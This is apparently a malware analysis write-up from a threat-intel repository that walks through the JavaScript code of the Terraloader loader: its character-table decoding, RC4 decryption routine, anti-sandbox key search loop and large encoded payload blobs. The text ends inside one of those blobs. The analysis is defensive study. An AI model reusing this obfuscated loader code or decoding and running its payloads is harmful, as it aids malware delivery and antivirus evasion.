ch0ic3/CyberThreatIntel
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
138839afdb
CyberThreatIntel/Additional Analysis/Terraloader/02-01-20/Analysis.md

1012 lines
331 KiB
Markdown
Raw Normal View History

Create Analysis.md
2020-01-02 17:34:47 +00:00
# Analysis of Terraloader sample
## Table of Contents
* [Malware analysis](#Malware-analysis)
Update Analysis.md
2020-01-03 10:23:37 +00:00
+ [First layer](#first)
+ [Second layer](#second)
+ [Additionnal Informations](#infos)
Create Analysis.md
2020-01-02 17:34:47 +00:00
* [Cyber kill chain](#Cyber-kill-chain)
* [Indicators Of Compromise (IOC)](#IOC)
* [References MITRE ATT&CK Matrix](#Ref-MITRE-ATTACK)
* [Links](#Links)
+ [Original Tweet](#tweet)
+ [Link Anyrun](#Links-Anyrun)
+ [Ressources](#Ressources)
<h2>Malware analysis <a name="Malware-analysis"></a></h2>
Update Analysis.md
2020-01-03 10:23:37 +00:00
<h3>First layer<a name="first"></a></h3>
<h6>This analysis presents a JavaScript loader (Terraloader) using many arrays, calculations and variables in memory for making harder the analysis and lowering the detection rate on antivirus. This loader has two stagers.</h6>
<h6>The first block of the payload is the globals values used for decode the first layer, this gives the tab of values as key, the offset, the base of characters and the rest for initialized the variables used for the second stage.</h6>
Create Analysis.md
2020-01-02 17:34:47 +00:00
```javascript
Update Analysis.md
2020-01-02 18:24:13 +00:00
var tab = [];
var base = [];
var offset_tab = 0;
var blawp718 = "";
var blawp4015 = "";
var blawp73 = "";
var blawp1023 = "";
var blawp7173 = "";
var blawp7178 = "";
var blawp9073 = "";
var blawp77 = "";
var blawp5376 = "";
var blawp6122 = "";
var blawp23 = "";
var blawp7 = "";
```
Update Analysis.md
2020-01-03 10:23:37 +00:00
<h6>The next block is composed of two functions. The first use a switch case condition to select the character corresponding to its ASCII value, one interesting thing to note is the fact that the default case isn't set, it is automatically created by an IDE, which is more the sign of a generation by a tool.</h6>
Update Analysis.md
2020-01-02 18:24:13 +00:00
```javascript
function get_ascii_value(arg)
{
var x = "";
switch (arg) {
case 32:
x = " ";
break;
case 33:
x = "!";
break;
case 34:
x = '"';
break;
case 35:
x = "#";
break;
case 36:
x = "$";
break;
case 37:
x = "%";
break;
case 38:
x = "&";
break;
case 39:
x = "'";
break;
case 40:
x = "(";
break;
case 41:
x = ")";
break;
case 42:
x = "*";
break;
case 43:
x = "+";
break;
case 44:
x = ",";
break;
case 45:
x = "-";
break;
case 46:
x = ".";
break;
case 47:
x = "/";
break;
case 48:
x = "0";
break;
case 49:
x = "1";
break;
case 50:
x = "2";
break;
case 51:
x = "3";
break;
case 52:
x = "4";
break;
case 53:
x = "5";
break;
case 54:
x = "6";
break;
case 55:
x = "7";
break;
case 56:
x = "8";
break;
case 57:
x = "9";
break;
case 58:
x = ":";
break;
case 59:
x = ";";
break;
case 60:
x = "<";
break;
case 61:
x = "=";
break;
case 62:
x = ">";
break;
case 63:
x = "?";
break;
case 64:
x = "@";
break;
case 65:
x = "A";
break;
case 66:
x = "B";
break;
case 67:
x = "C";
break;
case 68:
x = "D";
break;
case 69:
x = "E";
break;
case 70:
x = "F";
break;
case 71:
x = "G";
break;
case 72:
x = "H";
break;
case 73:
x = "I";
break;
case 74:
x = "J";
break;
case 75:
x = "K";
break;
case 76:
x = "L";
break;
case 77:
x = "M";
break;
case 78:
x = "N";
break;
case 79:
x = "O";
break;
case 80:
x = "P";
break;
case 81:
x = "Q";
break;
case 82:
x = "R";
break;
case 83:
x = "S";
break;
case 84:
x = "T";
break;
case 85:
x = "U";
break;
case 86:
x = "V";
break;
case 87:
x = "W";
break;
case 88:
x = "X";
break;
case 89:
x = "Y";
break;
case 90:
x = "Z";
break;
case 91:
x = "[";
break;
case 92:
x = "\\";
break;
case 93:
x = "]";
break;
case 94:
x = "^";
break;
case 95:
x = "_";
break;
case 96:
x = "`";
break;
case 97:
x = "a";
break;
case 98:
x = "b";
break;
case 99:
x = "c";
break;
case 100:
x = "d";
break;
case 101:
x = "e";
break;
case 102:
x = "f";
break;
case 103:
x = "g";
break;
case 104:
x = "h";
break;
case 105:
x = "i";
break;
case 106:
x = "j";
break;
case 107:
x = "k";
break;
case 108:
x = "l";
break;
case 109:
x = "m";
break;
case 110:
x = "n";
break;
case 111:
x = "o";
break;
case 112:
x = "p";
break;
case 113:
x = "q";
break;
case 114:
x = "r";
break;
case 115:
x = "s";
break;
case 116:
x = "t";
break;
case 117:
x = "u";
break;
case 118:
x = "v";
break;
case 119:
x = "w";
break;
case 120:
x = "x";
break;
case 121:
x = "y";
break;
case 122:
x = "z";
break;
case 123:
x = "{";
break;
case 124:
x = "|";
break;
case 125:
x = "}";
break;
case 126:
x = "~";
break;
}
return x;
}
```
Update Analysis.md
2020-01-03 10:23:37 +00:00
<h6>The second function reconstructs by a series of loops while for building the base of characters used by loader.</h6>
Create Analysis.md
2020-01-02 17:34:47 +00:00
Update Analysis.md
2020-01-02 18:24:13 +00:00
```javascript
function get_base()
{
var tab_string = [];
var tab_index = 0;
var i = 65;
while (i < 91)
{
tab_string[tab_index] = get_ascii_value(i);
i = i + 1;
tab_index = tab_index + 1;
}
i = 97 ;
while (i < 123)
{
tab_string[tab_index] = get_ascii_value(i);
i = i + 1;
tab_index = tab_index + 1;
}
i = 48;
while (i < 58)
{
tab_string[tab_index] = get_ascii_value(i);
i = i + 1;
tab_index = tab_index + 1;
}
tab_string[tab_index] = get_ascii_value(33);
tab_index = tab_index + 1;
i = 35;
while (i < 39) {
tab_string[tab_index] = get_ascii_value(i);
i = i + 1;
tab_index = tab_index + 1;
}
i = 40;
while (i < 45) {
tab_string[tab_index] = get_ascii_value(i);
i = i + 1;
tab_index = tab_index + 1;
}
tab_string[tab_index] = get_ascii_value((4450 - 4404));
tab_index = tab_index + 1;
tab_string[tab_index] = get_ascii_value((2169 - 2122));
tab_index = tab_index + 1;
i = 58;
while (i < 65) {
tab_string[tab_index] = get_ascii_value(i);
i = i + 1;
tab_index = tab_index + 1;
}
tab_string[tab_index] = get_ascii_value(91);
tab_index = tab_index + 1;
tab_string[tab_index] = get_ascii_value(93);
tab_index = tab_index + 1;
i = 94;
while (i < 97) {
tab_string[tab_index] = get_ascii_value(i);
i = i + 1;
tab_index = tab_index + 1;
}
i = 123;
while (i < 127) {
tab_string[tab_index] = get_ascii_value(i);
i = i + 1;
tab_index = tab_index + 1;
}
tab_string[tab_index] = get_ascii_value(34);
return tab_string;
}
function find_index(tab, search_element)
{
var index = 0;
do {
if (tab[index] === search_element) {return index;}
index = index + 1;
} while (index < get_length(tab));
}
Create Analysis.md
2020-01-02 17:34:47 +00:00
```
Update Analysis.md
2020-01-03 10:23:37 +00:00
<h6>The third block is composed of five functions, the first two give the length of an object and the second to push an element in succession in the chosen array. The third allows to create an ability to search for an element in an array and get the index. </h6>
Update Analysis.md
2020-01-02 19:36:56 +00:00
```javascript
function get_length(arg) {return arg.length;}
function push_element(tab, index) {return tab.push(index);}
function find_index(tab, search_element)
{
var index = 0;
do {
if (tab[index] === search_element) {return index;}
index = index + 1;
} while (index < get_length(tab));
}
```
Update Analysis.md
2020-01-03 10:23:37 +00:00
<h6>The penultimate function gives a capacity to compare two arrays for verity if the sequence of elements in an array is the same, this will be used later in the decryption of payloads. The last allows you to join the elements of an array to a string.</h6>
Update Analysis.md
2020-01-02 19:36:56 +00:00
```javascript
function compare_arrays(tab, tab2)
{
var lim = get_length(tab);
var index = 0;
if (lim !== get_length(tab2)) {return false;}
do {
if (tab[index] !== tab2[index]) {return false;}
index = index + 1;
} while (index < lim);
return true;
}
function string_join(arg)
{
var tab = [];
var result = "";
var i = 0;
do {
push_element(tab, get_ascii_value(arg[i]));
i = i + 1;
} while (i < get_length(arg));
result = tab.join("");
return result;
}
```
Update Analysis.md
2020-01-03 10:23:37 +00:00
<h6>The last block of four functions before seeing the main process of the script. The first function is RC4 decryption for the first decryption process. The second function the ability to decode byte by byte for the second decryption time. The third function is incremented on each return of the main algorithm for getting the key for the RC4 description, by this fact, this makes a fixed value of the loops needed for the main algorithm. The last function launches the process for decrypt all the payloads in the script (exe + doc files).</h6>
Update Analysis.md
2020-01-02 19:36:56 +00:00
```javascript
function rc4_gen_xor(arg1, arg2, arg3) {
var tab = [];
var j = 0;
var tmp_array;
var result = [];
var i;
var inc = 0;
if (arg2 && arg1) {
i = 0;
do {
tab[i] = i;
i += 1;
} while (i < 256);
i = 0;
do {
j = (j + tab[i] + arg2[i % arg3]) % 256;
tmp_array = tab[i];
tab[i] = tab[j];
tab[j] = tmp_array;
i += 1;
} while (i < 256);
i = 0;
j = 0;
do {
i = (i + 1) % 256;
j = (j + tab[i]) % 256;
tmp_array = tab[i];
tab[i] = tab[j];
tab[j] = tmp_array;
push_element(result, arg1[inc] ^ tab[(tab[i] + tab[j]) % 256]);
inc += 1;
} while (inc < get_length(arg1));
}
return result;
}
function decode_byte(arg)
{
if (arg) {
var length_arg = get_length(arg);
var tab = [];
var tmp_var = 0;
var inc_offset = 0;
var ref_offset = -1;
var ref_index;
var index_arg = 0;
do {
ref_index = find_index(base, arg.charAt(index_arg));
if (ref_index !== -1) {
if (ref_offset < 0) {ref_offset = ref_index;}
else {
ref_offset = ref_offset + ref_index * 91;
tmp_var = tmp_var | ref_offset << inc_offset;
if ((ref_offset & 8191) > 88) {inc_offset = inc_offset + 13;}
else {inc_offset = inc_offset + 14;}
do {
push_element(tab, tmp_var & 255);
tmp_var = tmp_var >> 8;
inc_offset = inc_offset - 8;
} while (inc_offset > 7);
ref_offset = -1;
}
}
index_arg = index_arg + 1;
} while (index_arg < length_arg);
if (ref_offset > -1) {push_element(tab, (tmp_var | ref_offset << inc_offset) & (255) );}
return (tab);
}
}
function switch_inc(arg)
{
var x = 0;
switch (parseInt(arg)) {
case 0:
x = 48;
break;
case 1:
x = 49;
break;
case 2:
x = 50;
break;
case 3:
x = 51;
break;
case 4:
x = 52;
break;
case 5:
x = 53;
break;
case 6:
x = 54;
break;
case 7:
x = 55;
break;
case 8:
x = 56;
break;
case 9:
x = 57;
break;
}
return x;
}
function decode_payload(arg, offset1, offset2)
{
var tab = decode_byte(arg);
var tab1 = rc4_gen_xor(tab, offset1, offset2);
return string_join(tab1);
}
```
Update Analysis.md
2020-01-03 10:23:37 +00:00
<h6>Now, the main algorithm for the main function. Firstly, this used to use a do-while loop to generate a sequence of elements if this trigger the same sequence that the reference, this breaks the loop in changing the value. This is an anti-sandbox and anti-analysis technique.</h6>
Update Analysis.md
2020-01-02 19:36:56 +00:00
```javascript
function main()
{
var seq = ["56","48","65","69","66","52","52","70","67","48","52","49","67","65","49","51","56","68","67","50","65","57","49","68","52","65","70","50","67","66"];
var base_rc4_array = ["215","222","25","139","201","0","105","245","65","151","59","255","225","38","56","210","150","155","102","217","254","187","160","241","186","19","19","145","227","137"];
var iden_correct = 0;
var inc = "";
var lim = 0;
var tmp_array = [];
var tab=["98","72","102","109","106","112","83","117","101","117","65","79","115","68","88","116","104","108"];
var index = get_length(tab);
var i = 0;
var result_rc4;
do {
inc = (i + "");
lim = get_length(inc);
if (lim === 1) {tab[index] = switch_inc(i);}
else
{
tmp_array = inc.split("");
tab[index] = switch_inc(tmp_array[0]);
switch (lim)
{
case 2:
tab[index + 1] = switch_inc(tmp_array[1]);
break;
case 3:
tab[index + 1] = switch_inc(tmp_array[1]);
tab[index + 2] = switch_inc(tmp_array[2]);
break;
case 4:
tab[index + 1] = switch_inc(tmp_array[1]);
tab[index + 2] = switch_inc(tmp_array[2]);
tab[index + 3] = switch_inc(tmp_array[3]);
break;
case 5:
tab[index + 1] = switch_inc(tmp_array[1]);
tab[index + 2] = switch_inc(tmp_array[2]);
tab[index + 3] = switch_inc(tmp_array[3]);
tab[index + 4] = switch_inc(tmp_array[4]);
break;
case 6:
tab[index + 1] = switch_inc(tmp_array[1]);
tab[index + 2] = switch_inc(tmp_array[2]);
tab[index + 3] = switch_inc(tmp_array[3]);
tab[index + 4] = switch_inc(tmp_array[4]);
tab[index + 5] = switch_inc(tmp_array[5]);
break;
case 7:
tab[index + 1] = switch_inc(tmp_array[1]);
tab[index + 2] = switch_inc(tmp_array[2]);
tab[index + 3] = switch_inc(tmp_array[3]);
tab[index + 4] = switch_inc(tmp_array[4]);
tab[index + 5] = switch_inc(tmp_array[5]);
tab[index + 6] = switch_inc(tmp_array[6]);
break;
}
}
result_rc4 = rc4_gen_xor(base_rc4_array, tab, lim + index);
if (compare_arrays(result_rc4, seq) === true) { iden_correct = 915;}
i = i + 1;
} while (iden_correct === 0);
seq = 0;
base_rc4_array = 0;
i = 0;
offset_tab = lim + index;
Update Analysis.md
2020-01-02 20:42:00 +00:00
```
Update Analysis.md
2020-01-03 10:23:37 +00:00
<h6>By debugging, this gives the following parameters :</h6>
Update Analysis.md
2020-01-02 20:42:00 +00:00
|Variable|Value|
Update Analysis.md
2020-01-02 20:42:43 +00:00
| :-------------: |:-------------:|
Update Analysis.md
2020-01-02 20:42:00 +00:00
|i|200|
|lim|3|
|index|18|
|offset|21|
|tab|[98,72,102,109,106,112,83,117,101,117,65,79,115,68,88,116,104,108,49,57,57]|
Update Analysis.md
2020-01-03 10:23:37 +00:00
<h6>Once this done, this check again for be ensure that the process have been done and launch the second layer.</h6>
Update Analysis.md
2020-01-02 20:42:00 +00:00
```javascript
Update Analysis.md
2020-01-02 19:36:56 +00:00
if (iden_correct === 915)
{
blawp4015 = 'EeIv%zg?"inD5mU';
blawp73 = '3^WFo*N06.xVSb8.';
blawp1023 = 'c{+tm06*B';
blawp7173 = 'rVVF=+;Msl7';
blawp7178 = '?@1YW3E[A';
blawp9073 = '`EWyt';
blawp5376 = '9gIcn}d@)WoL".]xrZB';
Update Analysis.md
2020-01-02 20:42:00 +00:00
blawp77 = 'hVbb<+R07.PsT.d';
Update Analysis.md
2020-01-02 19:36:56 +00:00
blawp23 = 'Xejbr';
var blawp868 = 'q=bb.~cN[mUHO^M;T<B$Yr@5Xjzyu_6OcR%#u^#z(Wj|,l1OQ?`Y`3&:yP6jr`pq&j@oTj!%DX)"ZwG8uU!xHk$Dl="P8>gir$1zw9x$P!SgaC%;HP:{jG/im!gU&7I_X(IklQ6[dG:PI`<>ZU`iAc][&^z|Q3GIr&m_vK&#QGds:INk+7`NiTh1c*TimXeNl>z$f=K27q&v"evZ81mV7h+Ds+@6n4CO>c^?FGZ`+Xs&ilJY0ma!F}(/nRF5/XCCN3~jd:%t*te5uDgh73d^1FtvhwW!H`N%B&r?or8.u!An#v7^5BfjKW^}K]yLh(<9MI>9(AUb^f"Go8]l9Svylk=84;=X/jrf_cFHX3H87ks:=4.#Qx)7"c*A}pF.DgkQ1.<uwtHp/fHs$cFpF,yIqjo{,yERKl&lG{X6Vv<l}HSE0FxpmiQCF_75a:[T:/66OH|832~;D?:w5&7.3o:lYSd&X7YrI:R?kSfVhVU{=9D&5c&Q>?:Ei>erfni}J?>[)Q12+90Ct%&u8KG!|K~I4jOoHq~Cc_$?dI9ZN`EVe/r{W7nZ+{Zn5TZ"PA)l8RqSbSZDPDgh_=?M7:/8q[b6q]1]oo=.9T>38D&8&dL"ljtw/2UmHaDzWTa@Mb>Ln<]>[+<r<jaqEhz`|U>c(B9>9MttCS$DF:84O%E:d*MX:[{>B=8;`?5]9?0l)Z_.N=4L>B3UvT/lus:IHrmtn{q+q23FxTyl/NPB4f)Y^njSKZ!]xy_tNPq=Uq+[BNdL=(7z}r%}$>(8?_gKBP16yH9I{JU1t`Y7&&#d^3NC"+KuZ%FFI&jE+rX"fy"h@>8XQd@siq$K@+eTbFVQ5+Y33P)H,7dx;&@taQhdCObU7NxRAb{Y2kI+UL9f5X+Dxb&?DR|?khKIV?X[QFerFIeL[R~{D_WkQ[/iU=,?|YMg}tq#:Q$2`~J)HvEPJDalFC;^eQBl@x3+d|::s~SqlJ,u0UG.LiPHm/+`_%&gNK=".:2PTz<{6pdCamXVxavWxgz5x;[2>O2eI1_lEysb&._0.s+Bp4f&@Z"I:G`V~e5yGVvJc5HEVMU<m>(`wRfhv(q}nFp_|#s!"Jj0;G]u/(kjE|pDbu@bHq:r:I4.n5w@Ri#whG0t5+Zt)uGZb9aYqu7O|W5=;IL^7Nlm3K8>]7i*NBK7T"_%iJLKQkz^O6CL.~mG:la+&*dd^DW^AP0IZjd]&&KMKhXs/|y:2jo;duQ>zbNdo#|hn2:0v)SK!zP9ZW_#8Gl3;bZ>SnnpM2"w_CoTGG^@5d:o4mLK#c(xs)9V)jg;xoks?$z0s~e2!D5[6i^Sq.f(hlh3B/A[O`6r]H{7b@Shcy#+uG<QmV8FU/8Ji.9!B|9&9x"T^v?kNDI.Yk@nmR|/+]>T0s;M<)FOdw4.o`?a[qM}`KU[]4"SSBn~nZIdF<z6Vnd^aLn:~eV6yhOR3$q>S/@_W71{qzi%E=FM2sJb[oG.8fgz19nwwKHJSWd@,R@sfn1|?dyzcLk34r!m6c,LW^ZYKf/!,uJ(e3^09)"dgou=Uim<>M)Yzu?e+m:g!za`UIFu>j@z&TRB2KJqL!w?(tk==yUir5<kin>"0dA7Wc=^3#9L;0FZ$_J0N@9z%QT)[t,8H?P~%[R}Z=}rYO)X3nI?D#W[1$]WSUQBro@*q?EQ_{vVEKbijf>|M+?%>~wgHX*?bU<FY<{bMW?&zsVSbiN([=wu]x&NCw`hcspm*W51M76I7H"|6/qG&]$v%&o*6z7KFdIkC.BI>v%8~tU/ppM+|C~`n<l$G}]e!a..mGr*FQLXs<PXg(k_~kT!Fb6NelklQQ7>(U!U3H3d7mUT<fOqi@aDz3I+4RZtsWMw;RiKgdFSpcSoA!^3!g<t)Kg(W}5Pt2}F3_C&1{tJ;$vG%Btc.9A}y`wJXAI%(kOw7tQ$@<,4AM.cjRISM|a7jewR`m"d0q],6gA(`X6<v_]EE.jk=O4h?e8^?^"/^]5"kf:]Y!YZ|0sgNZXiJRhfQ3bxHpf2Y=&>=7^_KX!tjE^?BsgQF]2Qx9|u[ManzpM2$uuLM/pV,_6C*MPwd6FrUJM$$xEyrp3$`NLM,.2D1i!;l}<yQILB"*C3n)9T,i=O*a5Gc|8>jfl({3HPnb3I84iD8~IrJ&`zyKom&Bb<%,0%i#/VV`^gK%YLjz]@HcUB)G#1wta6_qTuvDPtS8<9!MK3#tJrjcxxEAb#6BFpxO+x1L*9;k{6J(JoLzHNZ[,&|1^8@l8GPJGnub0_Gut#EgxuG(O)pC7n4t>@?Jk8q=eLRj.lJkL.*S5pZm/b?9p;q{LNL_7^~khc0VY}Y,~SMrHP602%hT|@b$^D|hh3)u+4B^JEs%RFg;NWJVph7]ON~KL)Veu_GC<`xkFbH?9bu/Y?s/Rhdc$5|jC1{_9y<W[s_>@LRL[Z**6uf/4AQfTGWcdOwRUz,_hjHbi@hC{_{8@Z=D4pp|UR4@ib>L5fkm[)"kMz.qbXjRQOVE&Gf`]U.Wk>3IT+<>)m/Rw;6GoYK7rXV|a^y+ftjnvn=Q!q*7Cl886HSnjpZ`OzRayeH&VIF)uyW(dMbR4KWxKp"4$lI}91{e4=H.2$=p1UBpV0<wPXv:=)mzQ`$]>qK@$Fjyv8.y0>cbl:Hc{ayQ+M!Skk%f9sHAe/$1s4=9#N_~Kw0quNvH`[UB{]e|97O:$9h/A?;zXFE7Tf+[WJZBRXB,m]F|DUPRp,Yvo,VT_ow8S%ZV:|q+Gg1Kq&Tu+e;,Ls)*(EH=y9V{WN{drs3bfI^^Se/Xb=qT<VCb`I7t)3I[LQ_g@d6K^#_wNm<O/M=~AS&p6GI5=4:x&{fK./G+om|&1[7P/v5W?Ee~IyaRlcgOY[c[d7e3=|K5}dMCaCg`y>F}3y?^e1Cq)*ROylJ<BDKjtK.IKQP,BvyjeP$=N%&7tblRA*3q/(mr^LV)B:]6r$]Q.+wXeGmA8IDaJO$}0j|<|*}6>VI~`F%B39wSMh]8idYkQDJ(@.(T/!"o/L{OwE~_bC*Z"h.,E(:6yM}hn|@E=k1M"e[|y*#p25Bc#UOj~WhPB:^&DuJFc?1nBc,X]O_iOl[Yc}!4[#&Gn.XSP5QpGpUvJ[>;Ye#D%nK#%%DqU~qTubztqJAMC=E"Nux,zvGed}F|WMl7dS.[vS18e!g;8~ZWI8A?6e_X:Moc@G@~S@Ks=Ui{~O+meM{kn_8:e8HZLIW6)<Q}](,EKl!H1N^_:<"|#y_9Xa<8U1pi;.Sr.G15/x[9xjXDHnpiJXL^C^W/_Q40}q42lBFpN]4Y]WP&AxgE<5?C<b|JSijmwL01yET.YX1k<S"p9,/CdRDoM;>{a3J^;1$*ItMkidms15kW7ENZEDlcTH,;h^9>j{VCQwDRb;v_v/3:,a;E!=iP3QF|pt}E]#5/s<5|]y)W<N|,_j2B84hhZ&0BWPDbyD[+;:GEX.*~whE<Ojwf.s#uG+9&L2;f/$H)8r+.1O:BRab@wOdhdGAQuP+9yJz#rz)g|G$f*96fEq$#7jye)%e|AnKibSFh>EC=R)|>=nURCnT+0:"f6,<kWLV:>KvR"MH%mJa2:+:khs6H;x_dP.mI%@G:otAi_~CX:otyXM)adAiF?T`_!/Zyo4=U8*UeQ^Y&5nMnG7,8a/imXBBMSqe5uJ~bY#cQ=sDD[i"C$g6cgz!{j0.JEk%f#8CqvWXi{N:.mrS~:,xa6wV6*~:,"ZkEnDGyNd]FB$r7}0|[VQw*9U56/ur#BhQEjZ)z.v70:h|w#&l3RAy`cMe!AtUZJ$4I^[d|9QkL31S>vQj9u9=VzdNLzdG4P!NkARtg1|`yROgm[R.?@sq.y#)u$J^q,fvSY;A1O_ZPS[z!][3kIvG@QD!*IV3ocvcY*Pi_SjeBeuYctjZ:2wI6U;*DFTH+4:j_!z!@Z#VfIruW(+I0~`h&U`8lc06O=(,si8o]pnc8C`J!b&?oS_>_37Ty&#MX+oQlzemlX?H%p^h`K?,r8h}KW^K;Gl~*Z$8C2$:aSiYERHjuk@S`:&Y6xySSXFQ[VzF:!j;iBT:esfDH@v<i]qR|pP7{OO:NbKX|M$t]V.aOQAX{HRD[8IK
Update Analysis.md
2020-01-02 21:25:09 +00:00
blawp718 = 'E67!RGb:wf[2S)~g"a.$?&%!(h5Yt;KdiJ6[hD$0AlfRt6pbY/c2xYicDK+k7stKIp7Q<ws3#<V^.=pQT(|X0r%)E2x<pIR;l3.`l<ghx^G4svt9g^#^x%3B!iKS)%MvX>=KXntvTu$j7)my61dw2`fB+a3vz~oD&qg8O{q&8<MX7S6_xX(v/t8CSK3htOjD(MmMH)LW4,/vr3}@D5]o|[&A?:^hX$|JH//5YR2`cy!q@r(sjx~p(47FfWsIVz!H6};h,yTgiJagSF#X/Yn[MqDF;3v,,`[uer.w/WH9Ml`xG6<pxY1hvEk|O[x+hw3T3`+[=m"T673bk@D/PxL%M_fg"4M?91XN4P"Bpb0pYeXG6(/p|iN|$uz*8/e%t>HxM&TJ5V&i8s+BkHP~6=6j)]veqcy$*hlK4G(/8Q},.t/XPV7*~YhIXxfN?)3UrRh5A2m:=gv5&.`ly{,#o![5w|H@"VK"Qkeae>wUxj(3g}:e`iYd<a$9wx%oy/~^ynvhLZwM%a}|ccAdv&t_JaU{4kYNS7`N;gL=[8j1S}n$T9e=~z!KJl:^Zk:abkm3?c~`24*ZOckTcaL[O#WVn:27NboU53]WLeI(&z/5xx,z4M/}R=w;|/Zl&YtKQe_Y3nFFLl"+8}Alwd5dsUP(lMkG1*q,KS70)k<EE{rmzb~8lkSq3tq(ReUO9w7PG05*>S9=AW2wd<u_*D8("n.|cQFer6]s9~M30mAY~f$nuMR6R!|[yUnk_w`HE!(kle8Yr;cTgG=)T?&G.K698U3sCQBwl|)#}|U#X(^3[FcX.Bq`(#D;,&w+"67EQ~L*Hb`BZ@![/o"r<OpUOY6@lJ#7M^C5H=IAu{"J1Bn~EN9fkM<5*K(smivo"$lqfPIl5?yT9>4Vh1;(.A}BN{X+!;VN*w|D.22Z*6:<X&Xt48,fsG|zK~ccqxpQ/1RxtZ5iA|!sr""a;s^i1imaS?KwVD"KM|3XY[5r55,[O!d3jrz|26;WkiFV?/s$}[5yUhT&B?:HGxoi,aJ<Yu7X2)c3mCfNUT6Z|zGYb.p,Q87ntx3J]}`mL,Nd;MOL=`H^_fIkdt]<6aIwMj}Zj{B3Lrn^]gu@2!?`@.ol]g*?lwG9,Ad{yCF7!MfBF4nI3IZL.T7w$nG:#Ik)`vS)&D#qrIC]7DM0+D&y#te1Z!3*ntJ!HN4+qM43c>C^I5*JnhNe{rkFT[7YI;W`gT|#XEw_[z"j[EqGUp[/$q[JTHa$:DURH3aI@kF%8^W>mrTH}!wxKwSxY@/g<F/cAw~zS0d@0:Cm~|$&dl,g`"A$86M0y]n|C83R5@z/[CbPJm1$wQ1s1OGT:(0kG=>).^H"b{4gd_G.xPh(s[g]K*9%*6OD&#8^p/g]*8*pV~<F$UocCpwtx[Kfew}Z2?m72ozqh&f7h{n!S;T(#ZH#JD.3Yr_]4Y)~|4i2B8`p/d>~Gkk%8/1:^2]L*HM7L2=G|V^uUqoMhXn%FR0amh2>ELq:Dg[R3qU>~U;6+I=~(<tG(0H<5!olun82p}astns2*Yx4:1JHt/o>M/Iy}#_#*r!*k}._A[?=2)>~<7v#AHx&B5<jj]QyX_9S$^%#qht%!nk033n/O!S]1~@T1iG)5.+W&;Mq@5bO1M%#NSb(W&/Roa<9nh@k<$aoY&}E0vBP4`16C33Or=Ecwr?H^HJ%`OT{KLvbnh}X7zFon7GV}Jy%hBg^}2CSwFTF>SmG)Q.,#G_p,kssy<Q7X7zQh:On8jNWfn<%y<)j,!dzP,^MxI=uDV|a+KUKEtl|,`"2za]JXTm>Y<XNgl!{7`L_"}?Qx~rZ[$Kw;*dboGmN9u(CYb7PA@fVpd|#u=P*B9"N:Lz/v,9KkF!Y5>6g(,=dqa1D~H=$YZyT+.<kMbwo=VYhm1O5DX4YK&7.U17ayk4gZkIV:~q7i$j}SwD1OVE&p[=XO)WP}G0or.ScRj!fV>5rUX0VwZlI/`O%[/TgeYohT)aGpHv.)7MJPYfS8r@m6#>cg}:Z.jC(vbr,i<6us61JpmK{x3XeU1"%vesl~<stwtbcWKFi|km:.boL">"M:/6}Pg*5SYRh^]#UeAyl3M/y{vy<z`g#~z.SW0Ta!*yYR_6sVE3wz%x8J=j8t__gw!aHpP~Mf<aj3DKue&jtMGHWa;kR@;Ofo4Dxp|&JdKUE^(|tgcp+{Ek%+]#HR[xG#@I3bef_LZANwbDmuR24hV+&v0ItuMv*R1L3*5&mMIOpYRw6#k_KS,=M`K32cNuU,4w)y9(lrX(n7^|doU8Py0E;PHkaQUTWaIMfEo@crD+4",dWbz:J6//91Dw&jCe4p1U%]2gC7wVmBS:4231n=_`|C4+%Ze9G[n5b4/VW6II2h{iEy%+F4di.Ww^co9@|aJk.moIdetaCNmJ63Sj5:S(tNAQ0tCEHF1~Z3n9I(wKV`DWeYB_g6T}V0iXrXU(yLq6$a_Uqo<BVPm:0G^E_dNWW+BeDD)GoHowGJu1wug&Ztf$L%(m^D0<@4PE<u^)&ql,u45m^<sQ9qD~q3u<L=F=dH<$Cxzbta#G!aLNK|Pm62gHrT08kxZ0.NW)rBKd)#x1_$Cc(YQs~JCS|Lqi=Ir8|"4+0gFVV]o!Rv3$s$5tq(gM#kfY".ngI"0=~<x^8[sM(d,0M*Riz3Ep)EzTY_=;ECM&$Acd"guzs%xysssw5#Z{0$t_zbfu<X*VIt;W,2h14%Kc`q|gZ^LMxr79h=c#kF5k:1Q&3Wf=ROsMnxcYS1(bE(:kaJ5qIQxEhOHXJ@?xk~fabd~(G&]z%Al]op0f!q[`]cGLWF:<;}alefW7p0XcFDUyakbDsc`V)S7J2geHq/m$hb|Il,H8!XS?rVM9IM=^13iFc{#Rb&~gypStO_OErrlbs6a#CduM<1"^%S0054yUP@O0%T@`5~s!td^CxPFO"W[[hGXKU(]9{lE7spnZnVH^JV=.(Pw.%5Epg:fMj{rk`);dym21kO.mku;[0(roZUotgH?py$1?|#r0=q.1UZ]V}g1jN!O<9t2);cI:z0l%jJuM*mu&C*G]u>aswD[9SAN{8fJdfmLUpUWXEUV]P2z4_kbW?@&QS,3G_moQ+c?hguUS2t><z%[2KY*MW^8`Ifk$U{uA;(Fp#$,bbe4UG;<(bHmO^$:z6Cr`sFKQ3SGDGo8k/qM@b9FS~Lc=sWBU?`MBfVxHp}6G0r/:hOI}e%]Sj!~TAwbokR+Om9"LnA/fBbrkN`_*14;Cv8rzTIhF*4MDN9w8:V%OO#(j.n1ZjQ7U+/K`<.ZK=Q^S{E&T%`@2.R.ir!1>_bJZ.tR!IHz>E5cnF*~Xt`}P[Mb$dE^AjTWRBa})*{TC|i/yP&@3UZI"@h6S4k4)Hp>b5}`b`Wfjj.lvm(r4]<GlxlQm:7:&g,E(G1BzSD45_0vatSc_cY`)_Bf&5UxuAP(3BYFX*(<VKZBJj#L>~aoy82zK#[]E"U3|amry,<(8=z)wr?F@?kEi!Tm=zYmgL$p|~X$>2eHs:AOj"MH49cGH}m|uLoYzYz={g!&h,bNU>uxqR]tGpe<W7Nnkj!F.AF^+"JwshUJ*6ljn~&Q!ZhtYPZwna>g@I:>9&"6w9zqsCe{R$eoo`F%!i~rwcXR7D9iw38JDN60J[w;Gl.gd"[.iA1wvO#}2Rk3TLqMs"QlZ$C]d!8[Np/52sG/YAd<ql6QGt(2XuufuD]G=/,9t^$Z>v(C]y7wIPHaV(C/#kY;>3L;%*aTlZgOfcRB,Ti+M:}0vX8Dr^P:+h3$W0hCeh@JTjS_0!*oI6~f_<m_T}Zqf=]PURHb{Y!i%5xkpem2|%0}8u_H}s?=,uf&K3PdEubB$=Va"naBG5spZ6BRub6vZOe/D"2F>g%}$f.6{f$ujV7Jm9uU|]}BucmE)R6]D)#ypYQemEfGKJ